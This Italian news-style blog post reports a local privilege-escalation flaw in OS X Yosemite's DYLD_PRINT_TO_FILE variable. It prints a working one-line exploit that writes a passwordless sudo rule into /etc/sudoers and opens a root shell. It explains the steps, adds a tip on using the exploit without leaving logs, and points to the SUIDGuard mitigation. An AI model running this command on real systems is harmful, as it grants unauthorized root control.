Apple OS X Yosemite, nuovo exploit locale: così piccolo che sta in un tweet!

macosx exploit

Povera Apple!

Non se la sta passando proprio bene in questi ultimi tempi.

Il ricercatore Stefan Esser ha scoperto una nuova falla nell’ultima versione stabile del sistema operativo dell’azienda di Cupertino.

OS X Yosemite – Every bit as vulnerable as it looks

Yosemite consente facilmente ad un qualsiasi utente di sistema di elevare i propri privilegi a quelli di amministratore.

L’exploit è così semplice da poter stare in un tweet: qualche sequenza di comandi shell e si ottiene il pieno controllo della macchina target.

Ecco uno dei tanti modi per sfruttare la vulnerabilità:

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL">&3'|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;unset DYLD_PRINT_TO_FILE;sudo –s

In breve, la variabile di sistema DYLD_PRINT_TO_FILE, introdotta con l’ultima versione del sistema operativo, consente di scrivere qualsiasi testo in un file a nostro piacimento ed in maniera piuttosto facile.

Nell’esempio indicato viene sfruttata per inserire la riga ‘nomeutente ALL=(ALL) NOPASSWD:ALL’ nel file /etc/sudoers.

In particolare, il comando ‘echo “$(whoami) ALL=(ALL) NOPASSWD:ALL”‘ sarà eseguito nel momento in cui verrà richiamato l’eseguibile newgrp

Soluzione

Per ora non esistono ancora aggiornamenti ufficiali, vediamo stavolta quanto tempo impiegherà Apple per fornire una soluzione alla problematica.

Per gli utenti più smaliziati, Stefan Esser fornisce un tool per la protezione da questo tipo di attacchi che è disponibile su GitHub e si chiama SUIDGuard

Piccola nota

Vi consiglio di effettuare sempre l’unset della variabile dell’utente dopo aver eseguito l’exploit, altrimenti vi ritroverete il file target pieno di log di sistema 😉